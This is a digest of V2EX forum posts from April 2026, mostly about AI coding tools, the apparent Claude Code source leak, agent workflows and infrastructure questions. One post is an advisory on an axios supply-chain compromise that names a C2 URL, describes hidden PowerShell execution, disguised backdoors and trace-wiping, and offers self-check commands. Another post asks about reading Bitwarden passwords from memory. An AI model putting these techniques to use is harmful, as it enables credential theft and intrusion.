v2ex_hot_2026-04-01

V2EX 热门帖子

1. 各厂商 Coding Plan 真实额度,给有需要的人

https://github.com/mahonzhan/awesome-coding-plan

作者: mahonzhan | 发布时间: 2026-03-31 20:54


2. 我开源了一份 Claude Code 技术文档, 欢迎大家查阅

大家好, 我速速更新了一版 Claude Code 的架构和技术分析文档, 目前已经包含 Agent Memory, Skills, Tool Call, MCP, Sandbox 的基础技术分析, 以及大家最关心的用户信息收集等安全问题.

文档目前还在完善和修改, 欢迎大家 star, 有任何想要继续探索的问题欢迎大家提 issues 或者在本文下方进行评论, 我会持续修改.

仓库链接 https://github.com/liuup/claude-code-analysis

作者: AKAUP | 发布时间: 2026-03-31 23:10


3. Claude Code 源码泄露后,我连夜 Vibe Coding 写了一份学习笔记

昨天看到 Anthropic 的 Claude Code 因为 npm 包里的 source map 文件意外泄露了完整源码( 51 万多行 TypeScript ),社区讨论挺热闹的。
我对这类 agentic coding 工具的内部实现一直挺好奇的,就连夜用 Vibe Coding 的方式快速翻了翻代码,顺手整理了一份很基础的学习文档,把自己觉得有意思或值得记录的点记了下来。读起来还挺顺畅的,就分享在这里,供有兴趣的朋友参考。

仓库地址(纯个人学习记录): https://github.com/mylxsw/cc-src-learning

里面内容比较粗糙,主要是边看边记的一些拆解和要点。
如果大家也在看这个泄露的源码,欢迎交流

作者: mylxsw | 发布时间: 2026-03-31 16:37


4. bitwarden 的数据在 Windows 内存中是明文吗?

bitwarden Windows 桌面版本的数据在内存中是不是明文?
其他程序能直接获取到各种密码吗?
那主密码会直接明文保存在内存吗?

如果关闭 uac 和各种安全软件防护,并且直接使用内置管理员账户 Administrator 进行登录,这样是不是任何程序都能直接读取 bitwarden 的内存并获取到各种明文密码?

作者: zictos | 发布时间: 2026-03-31 05:51


5. Claude Code 的源码好像被 Anthropic 自己发出来了

目前可以直接下载 map:
npm pack @anthropic-ai/claude-code@2.1.88 –registry=https://registry.npmjs.org/
https://imgur.com/a/4uRyLKa

作者: ggdxwz | 发布时间: 2026-03-31 08:57


6. 阿里云的 Coding Plan 现在是不是根本不放货了

说是 9:30 补货,9:30:00 刷新页面还是售罄,有抢到的兄弟吗?要真不补货干脆别在页面标什么每天 9:30 补货了,浪费感情

作者: kincaid | 发布时间: 2026-03-31 01:46


7. 今晚继续直播 24 小时运行 AI 公司, AI 经理指挥 AI 员工,自主编程(连续跑了几天)

最近做了个开源项目: https://github.com/golutra/golutra

简单说就是一个 多 CLI 的 AI 工作空间,可以组建一个 蜂群 Agent Team ,让不同 AI 协作工作,有点像搭一个 一人公司的 AI 团队,可以长期运行。自定义工作流(不同行业场景都能搭),工作流模板一键导入导出,24 小时运行的 AI 自动化系统。

即将加入的能力包括:

CEO Agent —— 真正的顶层调度者,目标是一个月不用人监管,持续自主运行并产出价值,能够精确构建子 Agent ,并在不同角色与任务之间实现记忆分层。

直播地址: https://live.bilibili.com/26532995/?live_from=86001&spm_id_from=333.1387.0.0

欢迎大佬们给出建议

作者: seeksky | 发布时间: 2026-03-31 14:39


8. learn-real-claude-code——发生在泄露之后

https://github.com/674019130/learn-real-claude-code

仿 learn-claude-code 搓了一版,适合之前看过 lcc 项目的同学进阶(其实我自己还没开始看哈哈哈)

作者: EdwardXia | 发布时间: 2026-03-31 17:27


9. 这种三省六部的 agent 架构有没有用?有用过的麻?





除了特别慢,还特别费 token ,好像也不是很好用呀

作者: lynn1su | 发布时间: 2026-03-31 06:11


10. axios@1.14.1 遭遇供应链投毒:针对开发者及 MCP 用户的高隐蔽性 0-day 攻击

这是 2026 年 3 月 31 日(不到 24 小时前) 爆发的全新 0day 供应链攻击,目前 npm 官方和主流安全社区尚未公开披露。

攻击核心

通过 npx 安装 latest 版本时,**axios@1.14.1** 被恶意投毒,偷偷引入了伪装成 crypto-js 的恶意包 plain-crypto-js@4.2.1

不仅普通开发者受影响 ,大量使用 AI Coding CLI ( Cursor 、Claude Code 、Windsurf 、Codex 等)调用 open-websearchexa-mcp-server 等 MCP 工具的用户也极易中招,因为它们的 npx 缓存同样被污染。

攻击手法(三平台全覆盖)

C2 服务器<http://sfrclak.com:8000/6202033>

  • Windows

    • 复制 powershell.exeC:\ProgramData\wt.exe(伪装成 Windows Terminal )
    • 生成 VBS 脚本下载 payload ,隐藏执行 PowerShell (-w hidden -ep bypass
    • 执行后自删除所有痕迹
  • macOS

    • 下载后门二进制到 /Library/Caches/com.apple.act.mond(伪装系统进程)
    • 赋予权限后后台运行 + 连回 C2
    • 通过 osascript 执行并擦除痕迹
  • Linux

    • 下载 Python 后门到 /tmp/[ld.py](http://ld.py)
    • nohup 后台常驻

最阴险的是毁尸灭迹

  • 删除自身的 setup.js
  • [package.md](http://package) 重命名为 package.json,彻底覆盖原始 postinstall 字段
  • 事后查看 package.jsonnpm list 几乎看不出任何异常

快速自查命令(强烈建议立刻执行)

# 检查可疑 axios 版本
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"

# 检查 lock 文件
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"

# 检查恶意依赖
ls node_modules/plain-crypto-js 2>/dev/null && echo "⚠️ 可能已中招!"

# 检查 RAT 残留痕迹
# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "⚠️ COMPROMISED"

# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "⚠️ COMPROMISED"

# Windows (cmd)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED 

作者: 0X00FFFF | 发布时间: 2026-03-31 03:47


11. 关于我百万字逆向 CC 但是被 A\ “反制”一事

首先,我想先来一句: So, Anthropic I F*** You


2026 年 3 月 29 号我发布了我精心准备的约百万字节纯字符 CC 逆向分析文档 https://www.v2ex.com/t/1202048

当时最担心的是被 A\ 起诉然后 Github 仓库被下架或者其他反制措施

结果没想到啊没想到,2026 年 3 月 31 号,A\ 你居然直接把 CC “开源”了,wtf???


不过也是一件好事,起码我的目的从某种意义上说是达成了

附上一句:我对比了一下,我的逆向结果起码还是很准确的…

人生第一次离奇事件,特此记录

作者: Hitmux | 发布时间: 2026-03-31 10:42


12. webminal 的 15 年坚持,虽然没用过但挺感动的

这是一个免费练习 linux 的在线网站,提供练习环境和教程,作者本人分享一路走来的经历和感受,用的技术大部分比较旧但很优秀,同时作者希望获得捐赠,用于扩容服务器内存帮助更多想学习 linux 的人。

文章链接

用的大部分是学生,虽然我没用过,但以前刚学习的时候也是受到各类社区的诸多帮助,热心大佬的无私分享,挺惊喜有个这样的项目,打算也尽点力

作者: plko345 | 发布时间: 2026-03-31 15:31


13. 基于 casdoor 的 ELK 开源登录认证解决方案: elk-auth-casdoor

前言

ELK 的一大缺点就是这东西最初是没有登录机制的,只要拿到了 url 地址,kibana 看板谁都可以访问一下。后来 ELK 自带了一套 xpack 进行登录认证,可是除了账户名密码登录这种最原始的方法,剩下的高级功能,比如 oauth, oidc, ldap ,统统都是收费的…..总不能给每个人都专门搞一个 kibana 账户名密码吧……

所以呢,这里有一个基于 casdoor 的 elk 鉴权解决方案,不要钱,开源的,还有人维护呢~。Casdoor 是一个基于 OAuth 2.0 / OIDC 的 UI 优先集中认证 / 单点登录 (SSO) 平台,而 casdoor/elk-auth-casdoor 这套解决方案,则是一个 反向代理,他可以拦截所有未经登录的前往 elk 的 http 访问流量,并且引导未登录用户进行登录,而且这个反向代理对已登录用户是完全透明 的。

仓库地址 https://github.com/casdoor/elk-auth-casdoor

QQ 群:645200447

如果您有更多相关的特殊需求可以加群,我们会有专人对接~ (可以联系 ComradeProgrammer )

casdoor 是什么

Casdoor 是一个基于 OAuth 2.0 / OIDC 的 UI 优先集中认证 / 单点登录 (SSO) 平台,简单点说,就是 Casdoor 可以帮你解决 用户管理 的难题,你无需开发用户登录注册等与用户鉴权相关的一系列功能,只需几个步骤,简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。

仓库地址: https://github.com/casbin/casdoor

演示地址: https://door.casbin.com/

官网文档: https://casdoor.org/

QQ 群:645200447

Casdoor 还支持 ldap ,saml 等诸多功能…..

Casdoor 目前作为 Casbin 社区项目统一使用的鉴权平台,项目已开源,希望得到大家的一些建议和 Star~,我们会及时跟进反馈并改正问题哒

Casdoor 又有哪些特性?

  • 支持普通的账户密码注册登录,也支持各种常见的第三方认证,例如 GitHub 、Facebook 、Google 、Wechat 、QQ 、LinkedIn 等等,截止目前共 9 个平台,并在不断听取用户建议对更多的平台提供支持。
  • 管理方便。Casdoor 内部将模块分为了 5 大类,Organization 、User 、Application 、Token 和 Provider 。可以同时接入多个组织,组织下有不同应用,用户可以通过应用或组织分类,单独管理任何组织、应用或用户的 Token 令牌,轻松管理复杂系统,目前已部署在 Casbin 社区各种系统当作鉴权平台。
  • 自定义程度高。Casdoor 可以随意修改登录方式,例如是否允许密码或第三方登录,自定义应用的注册项数量,是否启用两步验证,以及是否允许各个 Provider 登录、注册等等,高度可插拔。
  • 具备 Swagger API 文档。清晰的 API 介绍,无需阅读源代码即可直接方便调用各个 API 接口,提供定制化功能。
  • 前后端分离架构,部署简单。作为统一认证平台,除了性能,稳定性,新特性之外,易用性也是考量的重要标准,Casdoor 后端使用 Golang 语言开发,前端使用 React.js 框架,使用者只需启动后端服务,并将前端工程文件打包,即可直接使用,操作简单,上手难度低。 …

作者: Casbin | 发布时间: 2024-03-08 02:33


14. idea 2026.1 正式版大伙儿更新了吗? 又发现什么新 bug 了吗?

官方推送里面说修了 1k 多个问题,其中单是各种场景卡顿卡死的就 40 个。 之前各种卡死已经严重影响使用了,话说这个版本目前体感如何?

作者: iflint | 发布时间: 2026-03-31 11:44


15. 别让 AI 写得像 AI:用自己的 83 篇博客训练专属写作助手,顺手做成了一个 Skill

用 AI 辅助写文章这件事,我折腾了挺长时间,一直有一个问题没解决:写出来的东西读着不像我写的。

语气对,结构对,就是有点”飘”——像一个模仿我的人写的,而不是我自己写的。

后来意识到问题在哪:AI 不知道我怎么写东西。我没把自己的内容喂给它,光靠对话里几句描述,它当然摸不准。

解决这个问题花了我一段时间,最后跑通的方案是:把博客历史文章全部导入 Obsidian 作为知识库,用 Claude Code 分析提炼出风格档案,再把整套工作流封装成一个可复用的 Skill


Obsidian:不只是笔记工具,是知识库底座

这件事的关键前提是:Obsidian 存的是本地 Markdown 文件。

这意味着 Claude Code 可以直接读它。不需要 API 对接,不需要导出,直接在终端打开 Vault 目录,Claude Code 就能访问里面的所有内容。

这和把文章发给 AI 让它”记住”有本质区别——后者每次对话结束就清零了,前者是真正持久化的知识库,每次调用都能读到完整的历史内容。

把 83 篇已发布文章放进去之后,它就有了训练材料。

如果想学习 Obsidian 可以看:Obsidian 写作环境搭建:这 6 款插件让我的博客管理效率翻倍


支撑这套流程的几个插件

不是所有插件都和 Claude Code 有关,但有几个直接影响了知识库的可用性。

Git :Vault 接入 GitHub ,每 30 分钟自动 commit 一次。Claude Code 在终端工作,知道哪些文件是新的、哪些改过,版本追踪自然就有了。

Custom Attachment Location :图片按文章名归类到 assets/文章名/ 子目录。Claude Code 读文章的时候结构清晰,不会被一堆散落的图片文件干扰。

Templater :新建文章自动写入 Front Matter ,包括状态字段(草稿 / 已发布)。这是后面 Dataview 能查询写作进度的基础。

Dataview :用类 SQL 语法查 Vault 里的文章。我用它列出所有草稿、按分类汇总文章数量,也方便 Claude Code 快速定位需要参考的内容。

Local Images Plus :历史文章里的外链图片自动下载本地化。做完这步,整个 Vault 完全离线独立,不依赖任何服务器。

image


第一步:把历史文章变成结构化知识库

历史文章导入之后,先做两件事让知识库更好用。

一是统一目录结构。我按文章类型分了三个目录:VPS 测评/VPS 小白教程/金融/,草稿放 草稿/,灵感放 灵感收集/。结构清晰,Claude Code 在扫描文件的时候能更快定位。

二是给每篇文章加 Front Matter 标记状态。已发布的统一标 status: 已发布,方便后续只分析已发布内容,排除草稿干扰。

image


第二步:用 Claude Code 提炼风格档案

知识库搭好之后,让 Claude Code 读所有已发布文章,从几个维度做分析:

  • 语气和人称 :用不用「我」,怎么称呼读者
  • 句式习惯 :短句还是长句,有没有标志性的开头方式
  • 结构偏好 :怎么起头,怎么收尾,用不用步骤编号
  • 内容特征 :高频关键词,倾向用数据还是个人经历说话
  • 文章长度 :不同类型文章的字数范围

分析结果写入 Vault 根目录的 [风格档案.md](http://风格档案)。这个文件之后每次写文章都会被引用——相当于一份给 AI 的写作说明书,告诉它我习惯怎么写,不习惯怎么写。

有了这个文件,「用我的风格写一篇关于 X 的文章」这类需求才真正可靠。

风格档案不是一次性的,写的文章越多,回来更新一次,准确度就越高。


第三步:把工作流固化成 Skill

分析风格、生成选题、写大纲、写文章——这套流程每次都一样,很适合封装成可复用的 Skill 。

Skill 对 Claude Code 来说,是一个带触发条件的操作说明。当我说「帮我写一篇文章」或者「给我出几个选题」,Claude Code 自动加载这个 Skill ,按照里面定义的步骤走,不需要每次重新解释流程。

整套流程分六步:

Step 1 分析风格  →  Step 2 生成灵感  →  Step 3 用户选题
→  Step 4 生成大纲  →  Step 5 用户确认  →  Step 6 生成文章

每步都需要我确认才进入下一步。全自动跑完再给我看,不如每步都能介入调整——最后写出来的文章才真的是我想要的方向,不是 AI 自己发挥的版本。

Skill 里还有一个细节:每次生成文章之前,强制重新读取 [风格档案.md](http://风格档案),不依赖上下文记忆。这样即使对话轮数很多,风格也不会漂移。


现在实际的工作流

跑通之后,写一篇文章大概是这样:

在 Claude Code 里说「我想写一篇文章」,Skill 自动触发。先问有没有现成选题,没有的话读现有文章列表,生成 10 条候选,我挑一个。

然后它读 [风格档案.md](http://风格档案),按我的结构偏好生成大纲。我确认方向,说可以,它写正文,存到 草稿/ 目录。

我打开文件润色,改掉感觉不对的地方,发布。

花时间的部分只剩两件事:确认方向、最后润色 。选题、大纲、正文初稿这些环节基本不用从头想了。


总结

这套方案的核心逻辑只有一句话:用自己的内容训练 AI ,而不是让 AI 猜你的风格。

Obsidian 提供结构化的本地知识库,Claude Code 能直接读写本地文件,两者结合正好。风格档案是关键产物,Skill 是让它反复复用的最后一步。

如果你也在用 Obsidian 写博客,而且有一定数量的历史文章,这套方案可以直接复制。文章越多,训练出来的风格档案越准,生成的文章就越像你自己写的。

但是我最后想说的只是想介绍怎么搭建中的工作流,利用好手里的工具协助自己创作,节约自己的时间让自己可以把时间花费到其他地区。

作者: zp872571679 | 发布时间: 2026-03-31 15:19


16. claude code 源码泄露

哈哈哈哈,太草台了,正好供大家学习这个世界最先进的 agent 工具

原 x

作者: MoGeJiEr | 发布时间: 2026-03-31 09:30


17. 哪里有个人用的价格便宜又稳定的云服务器呀

其实只是需要一个公网 ip ,能把我内网的实体服务器映射出去。配置一般就行。阿里云那种一年 199 的只有新用户才有而且第二年就恢复原价了。

作者: frant1c | 发布时间: 2026-03-31 03:35


18. 给 Claude Code 加了个显示 GLM coding plan 剩余额度的状态栏

最近刚续费了智谱 Coding Plan 。平时 vibe coding 的时候,总想顺手看一眼 GLM 当前 5 小时额度还剩多少,不想再切网页。

看到 Codex 底部状态栏这种形式挺顺手,就给 Claude Code 搓了个小工具,会在底部显示类似:

  • GLM Lite | 5h left 91% | reset 14:47

  • GLM 91% | 14:47

  • GLM Lite ■□□□□□□□□□ 91% | 14:47

仓库: https://github.com/deluo/glm-quota-line

npm 安装:

npm install -g glm-quota-line
glm-quota-line install 

作者: stanley0black | 发布时间: 2026-03-31 09:40


19. macbook 32G 内存, M5 芯片本地跑大模型有推荐的吗?

我用了 qwen3.5-27B 能跑但是比较慢, 换成 9B 的比较快但不太聪明.

我本地用的推理框架是 omxl, 然后用小龙虾对接, 干活是能干活,就是有点慢, 当然和 codex 不能比, 可惜 codex/claude code 这些 key 烧的太快, 要等 7 天后, 这也是我本地跑大模型追去无限 token 的初衷.

请问各位能给予我的配置推荐几个更好更聪明的大模型吗?

另外基于刚出的谷歌 atomic chat, 这几天有人逆向优化了它, 号称在普通的 macbook 上也可流畅加载 35B 大模型,KV 缓存直接压缩 4.6 倍,不到一周就有 1.5K stars 了.

这是 github 仓库地址 https://github.com/TheTom/turboquant_plus

不过它是加载进 llama.cpp 部署, 这个切换模型需要手动, 我懒得折腾了, V 站有闲的人去折腾下, 然后告诉我实际效果吧, 可以的话我准备照抄作业.

另外附加上当前 qwen3.5-9b 的 tokens 用量, 真的很快, 随便让小龙虾干点活就上千万 token.

作者: Hermitist | 发布时间: 2026-03-31 06:52


20. 用 AI Agent 做自动化内容发布系统,踩了一个月坑后的总结

最近用 AI Agent 搭了一套自动化内容发布系统,把这段时间踩过的坑总结一下,顺便聊聊架构上的一些思考。

背景:目标是让 AI 团队替代部分人工完成内容创作 + 多平台分发(微博、掘金、CSDN 等),每天定时自动执行。


最大的坑:Agent 说「完成了」但其实没完

这是我踩过最多次的坑。Agent 调用工具发布文章,工具返回了某个值,Agent 就宣告完成。但实际上:

  • API 返回 200 但内容是错误信息(某些平台喜欢把错误包在 200 里)
  • 发布成功但文章处于审核/草稿状态,外部不可见
  • 文章发出去了但图片挂了

解决方案:在 Agent 的 SOUL.md 里写死规则——「任务完成」的定义必须包含可验证的外部状态( HTTP 状态码 + 返回内容检查 + URL 可访问),不能只看工具调用是否返回。


Cookie 管理是个持续工程

各平台的 Cookie 有效期差异很大,有的几天,有的几个月。一旦 Cookie 过期,自动化流程就静默失败了。

现在的方案:每次发布前先 health check (用 Cookie 请求一个需要登录的 API 端点),health check 失败立刻通知 + 停止本次任务,把 Cookie 过期时间记录在配置里提前 3 天提醒。


多 Agent 协作的上下文传递

用文件系统而不是内存传递上下文,原因:持久化( Agent 崩溃重启后能恢复)、可审计(出问题能看到每一步的输入输出)、多 Agent 并发时不会互相覆盖(用不同路径)。


Cron Job 的 systemEvent 要带足够上下文

Cron 触发的任务是无会话的,Agent 完全靠 prompt 里的上下文判断。这意味着 Cron 的 systemEvent text 要包含:今天的日期、任务目标、相关的资源路径、上次执行状态摘要。不能依赖「 Agent 记得上次聊了什么」,因为 Cron 每次都是全新会话。


工具失败的处理策略

不要无限重试,最多 3 次;每次重试前等待( exponential backoff );失败后写明失败原因到日志,不要吞掉错误;超过重试上限后通知人工介入,不要假装成功。


目前这套系统在我自己的服务器上稳定运行了一个多月,基本实现了「每天早上醒来内容已经发完」的状态。偶尔还是需要手动处理 Cookie 过期和平台审核问题,但大部分流程已经自动化了。

更多踩坑细节和架构图记录在公众号「 Wesley AI 日记」,如果做类似方向欢迎交流。

作者: caesor | 发布时间: 2026-03-31 07:02


21. Google Workspace 有优惠码之类的吗

G workspace 商务标准版,目前价格是$109.80 HKD/用户/月。我一直使用个人域名原价订阅。想问问是否有代理商或者优惠码一类的可以降低价格呀

作者: vencent | 发布时间: 2026-03-31 14:19


22. Harness 决定 Agent 上限:从代码执行到项目迭代

Harness 决定 Agent 上限:从代码执行到项目迭代

同一个模型,不同的 Harness ,SWE-bench 上差了 17 题。当模型能力趋于同质化,真正决定 AI Agent 表现上限的,不是它有多聪明,而是它被放在什么样的环境里工作。

TL;DR

2026 年,AI 工程领域达成了一个共识:Harness 比模型重要 。Claude Code 、Codex 、Cursor 已经为 agent 构建了成熟的代码执行 harness 。但当 agent 从”写一个函数”升级到”做一个项目”,它还缺一层东西——一个覆盖从想法细化到任务验收的项目管理 harness

这篇文章聊两件事:为什么 harness 已经成为 agent 表现的决定性因素,以及 Chorus( https://github.com/Chorus-AIDLC/Chorus) 在这个方向上的实践——如何让 agent 拥有完整的迭代环境,而不只是一个代码编辑器。


一、Harness Engineering:行业共识是怎么形成的

1.1 同一个模型,差了 17 题

2026 年初,一组 SWE-bench Verified 的评测数据引起了广泛讨论:Augment 、Cursor 、Claude Code 三个产品,都跑的 Claude Opus 4.5 ,731 道题,成绩差了 17 题。

模型完全一样。差异来自哪里?Harness ——包裹在模型外面的那层系统:工具定义、上下文管理、错误恢复、验证循环、子任务编排。

这不是个例。整个行业都在讲同一个故事:模型是 CPU ,Harness 是操作系统。没有操作系统,CPU 再快也只是一块芯片。

1.2 从 Prompt 到 Context 到 Harness:三次范式转移

阶段 时间 核心问题
Prompt Engineering 2022–2024 怎么写好一条指令
Context Engineering 2025 怎么策展所有相关信息( RAG 、Memory 、工具描述)
Harness Engineering 2026 怎么设计环境、约束和反馈循环

Mitchell Hashimoto ( HashiCorp 创始人)在 2026 年 2 月首次明确了”Harness Engineering”这个概念:

“Every time the agent makes a mistake, don’t just hope it does better next time. Engineer the environment so it can’t make that specific mistake the same way again.”

每次 agent 犯错,不要寄希望于”下次做对”。改造环境,让它不可能再用同样的方式犯错。

这句话精准地定义了 harness 的本质:不是教 agent 做什么,而是让环境保证 agent 只能做对的事

1.3 一场关于”围墙”的共识

2026 年 2 月起,这个认知从个人观点变成了行业共识——而且大家从不同方向抵达了同一个终点。

有人关注可靠性 :OpenAI 用 Codex agent 从空 repo 构建完整产品,零行人写代码,发现 harness 的工程设计决定了 agent 能否长时间可靠运行。有人关注学科定位 :Martin Fowler 撰文将 Harness Engineering 定位为软件工程实践的新分支——不是 AI 研究的分支,是工程实践的分支。有人关注评估能力 :Anthropic 提出 GAN 式 Generator/Evaluator 架构,核心发现是模型不能可靠地评估自己的工作,必须由 harness 提供外部验证环。

还有人把话说得更绝。Stripe 的 Minions 团队——“The Walls Matter More Than the Model”,围墙比引擎重要。Philipp Schmid 从数据视角补了一刀——“The Harness is the Dataset”,harness 捕获的工作轨迹本身就是竞争壁垒。

“2025 Was Agents. 2026 Is Agent Harnesses.” — Aakash Gupta

GitHub 上甚至已经有了专门的 awesome-agent-harness 合集( https://github.com/AutoJunjie/awesome-agent-harness),收录各家关于 harness 的文章、工具和实践。


二、现有 Harness 解决了什么,还没解决什么

2.1 代码级 Harness 已经成熟

当前主流的 agent harness 都聚焦在代码执行层

Claude Code 构建了最完整的六层架构:

  • CLAUDE.md (项目上下文)→ Tools/MCP (能力接入)→ Skills (方法论)→ Hooks (机械约束)→ Subagents (隔离工作者)→ Verifiers (验证循环)

Codex 走的是云沙箱路线:

  • Agent 拿到一个空白环境,读代码、做计划、写代码、跑测试、交 PR 。GPT-5.3-Codex 跑了 25 小时不间断,13M token ,30K 行代码。

Cursor 是 IDE 原生集成:

  • 实时协作,视觉反馈,360K 付费用户。

这些 harness 各有所长,但解决的问题是同一类:agent 怎么写代码 。包括怎么读文件、怎么调工具、怎么跑测试、出错了怎么恢复、上下文满了怎么压缩。

2.2 但”写什么代码”还是蛮荒地带

当 agent 从单任务(修一个 bug )升级到多任务(做一个 feature ),从单 agent 升级到多 agent 团队协作,代码级 harness 就不够用了。

缺失的环节:

  • 需求理解 :这个任务从哪来?需求是否被充分理解? agent 是在正确的理解上执行,还是在错误的假设上高效产出垃圾?
  • 任务编排 :5 个 agent 同时工作时,谁干什么?依赖关系是什么?两个 agent 同时抢一个任务怎么办?
  • 验收闭环 :任务完成后,谁来验证?验证标准是什么? agent 自己说”做完了”可信吗?
  • 迭代节奏 :一轮做完后,下一轮自动开始了吗?下游任务知道上游已完成了吗?

类比一下:现有的 harness 给了 agent 一个配置齐全的工位 ——双屏显示器、机械键盘、IDE 全装好。但没有给它一个项目部 ——没有需求评审、没有任务看板、没有 Sprint 节奏、没有验收标准。

Agent 知道怎么敲键盘,但不知道为什么敲、敲完给谁看、下一步做什么。


三、项目管理 Harness:让 Agent 拥有完整的迭代环境

Chorus 的定位不是替代 Claude Code 或 Codex——它在这些代码级 harness 之上,提供项目级 harness ,让 agent 拥有从想法到验收的完整迭代环。

3.1 完整管道:六个阶段,每个都有 harness 约束

阶段 谁在做 做什么
Idea 人类 抛出一个想法,可以很粗糙
Elaboration PM Agent → 人类 AI 不直接开干,而是向人类提问:”目标用户规模?””需要离线支持吗?”人类回答,AI 验证自洽性,有矛盾就追问,直到共识
Proposal PM Agent 产出文档草案 + 任务依赖图( DAG )
Approval Admin / 人类 审批方案,通过后任务才实体化
Execute Developer Agent 认领任务,在 Claude Code 中执行,自检验收标准后提交
Verify Admin / 人类 逐条验证验收标准,通过或打回。下游任务自动 unblock ,下一波开始

这不是一个”任务管理看板”。这是一个让 agent 知道自己在整个项目中处于什么位置的运行时环境

每个阶段的边界都是 harness 级别的约束,不是”建议 agent 遵守的最佳实践”:

  • 需求没细化完,开不了工
  • 方案没审批,任务不存在
  • 上游任务没验收,下游任务不会 unblock
  • 做完没过验收,不算 Done

这就是 Hashimoto 说的那件事:不是教 agent “你应该先理解需求再动手”——环境保证了它必须先理解需求才能动手

3.2 Reversed Conversation:AI 提问,人类回答

传统工作流的信息流向是单向的:

人写 Prompt → AI 执行 → 人检查结果 → 不满意改 Prompt → AI 重来

这个模式的致命问题:agent 在错误的理解上高效执行 。它可能写了 500 行完美的代码,但解决的是错误的问题。然后你改 prompt 让它重来,它又写了 500 行完美的代码,解决的是另一个错误的问题。

Chorus 的 Elaboration 机制反转了对话方向:

人提想法 → AI 提问 → 人回答 → AI 验证答案自洽性 → 有矛盾就追问 → 共识 → 再开干

PM Agent 读完一个 Idea 后,不是直接开干,而是生成一组结构化问题。比如人说”我要用户认证”,PM 会问:

  • 预计用户规模?(< 100 / 100-1k / 1k-10k / > 10k )
  • 需要离线支持吗?(完整 / 只读 / 不需要)
  • 第三方集成?( OAuth / OIDC / 自研)

如果人回答了”需要离线支持”但又说”要实时同步”,PM 会追问——因为这两个需求在某些场景下是矛盾的。

Harness 的价值不只是”让 agent 做得快”,更是”让 agent 做对的事”。Elaboration 是 Chorus 在 harness 层面对需求质量的保障:不是靠 agent 的”理解力”,而是靠结构化问答的流程约束

3.3 DAG + Wave 验证:多 Agent 并行不乱序

当一个 Proposal 产出 8 个任务、3 层依赖时,Chorus 构建 Task DAG (有向无环图),并用 Wave 模型管理执行节奏:

Wave 1: [Task A] [Task B] [Task C]  ← 无依赖,可并行
         ↓         ↓
Wave 2:      [Task D] [Task E]      ← 依赖 Wave 1 的任务
                  ↓
Wave 3:          [Task F]           ← 依赖 Task E

关键设计决策:不是在执行时强制阻塞,而是在验证时卡住——上游没验收,下游就不会开放

  • Wave 1 的任务可以被多个 agent 并行认领执行
  • 每个 agent 完成后提交验收
  • Wave 1 全部验收通过后,Wave 2 自动 unblock
  • 如果 Wave 1 某个任务验收失败被打回,依赖它的下游任务不会 unblock

这正是 Stripe 说的 “The Walls Matter More Than the Model”:DAG 就是墙。Agent 不需要”理解”依赖关系——环境本身阻止了乱序执行

3.4 验收不是可选项

Anthropic 的工程博客指出:模型不能可靠地评估自己的工作 。这是他们提出 GAN 式 Generator/Evaluator 架构的核心前提。

Chorus 在项目层面实现了这个原则:

  1. Developer Agent 完成任务后,先跑 Acceptance Criteria 自检 ——逐条对照验收标准,标记每一条是否满足
  2. 自检通过后提交验收,由 Admin 或人类逐条确认 ——不是 agent 自己说了算
  3. 验证失败可以打回 ——附带反馈,agent 修改后重新提交

Agent 说”做完了”,和 Admin 验证过”确实做完了”,是两件完全不同的事。Chorus 把这个区分编码成了 harness 的一部分,不依赖任何人”记得去检查”。


四、为什么项目管理层面的 Harness 是缺失的一环

回到最初的问题:行业已经证明 harness 比模型重要。SWE-bench 17 题的差距,来自代码执行层的 harness 差异。

那在项目层面呢?

想象一下:10 个能力相同的 agent 组成一个团队。一组在没有项目 harness 的情况下协作——Team Lead 用自然语言分配任务,agent 自己决定执行顺序,做完自己汇报,没有验收环节。另一组使用项目 harness——需求经过结构化细化,任务按 DAG 编排,执行有 session 追踪,完成有验收闭环。

哪组的产出更可靠?

人类软件团队几十年的工程实践早就给出了答案:个人能力 × 协作效率 = 团队产出 。再优秀的工程师,在没有 Jira/Linear 、没有 Sprint 、没有 Code Review 的环境里远程协作,也会陷入混乱。

Agent 团队没有理由例外。Chorus 做的事情,本质上就是给 agent 团队一个 agent-native 的 Jira ——不是把人类的项目管理工具套在 agent 身上,而是从 agent 的工作方式出发,重新设计需求细化、任务编排和验收闭环

代码级 harness 解决了 **”每个 agent 单独工作时的表现”**。项目级 harness 解决了 **”一群 agent 一起工作时的表现”**。前者的价值已被 SWE-bench 证实,后者的价值只会更大——因为协作的复杂度远高于单任务执行。


五、结语

“2025 Was Agents. 2026 Is Agent Harnesses.” — Aakash Gupta

这句话需要一个补充:

2026 年的 Harness Engineering 有两层。第一层是代码级 harness ——Claude Code 、Codex 、Cursor 已经做得很好。第二层是项目级 harness ——从想法细化到任务验收的完整迭代环境——这是正在被填补的空白。

层次 解决的问题 代表
代码级 Harness Agent 怎么写代码 Claude Code, Codex, Cursor
项目级 Harness Agent 怎么做项目 Chorus

两层结合,agent 才拥有完整的工作环境:知道做什么( Idea + Elaboration )、怎么做( Code Harness )、做完给谁看( Verify )、下一步是什么( DAG unblock )。

当模型能力越来越强、越来越同质化,决定 agent 上限的不再是它有多聪明,而是它被放在什么样的环境里工作。

Harness 不是辅助。Harness 是上限。


引用与参考

作者: autojunjie | 发布时间: 2026-03-31 04:10


23. 如何解决 eBPF sockmap 重定向转发中背压缺失带来的 OOM ?

我在尝试使用 eBPF 的 BPF_PROG_TYPE_SK_SKBBPF_MAP_TYPE_SOCKHASH 实现 socket 的铰接转发,目标是基于 bpf_sk_redirect_hash 将一个 socket 的 ingress 队列数据转发到另一个 socket 的 egress 队列,但是在实际的吞吐量测试时出现了系统 OOM 。

具体的环境如下:

  1. Linux Kernel 6.8
  2. 2 个 socket 所处网络接口不同,且 2 个网络接口带宽不一致,转发源 socket 所处接口 (测试用的 loopback) 带宽高于目标 socket 所处带宽
  3. 吞吐测试是在 loopback 上使用 netperf 建立源 socket 连接,目标是转发到另一个网络接口的 socket egress 发送队列进行发送
  4. 具体代码可以见 https://github.com/SunBK201/UA3F/blob/v3.3.0/src/internal/bpf/sockmap/sockmap.c

我的疑问:

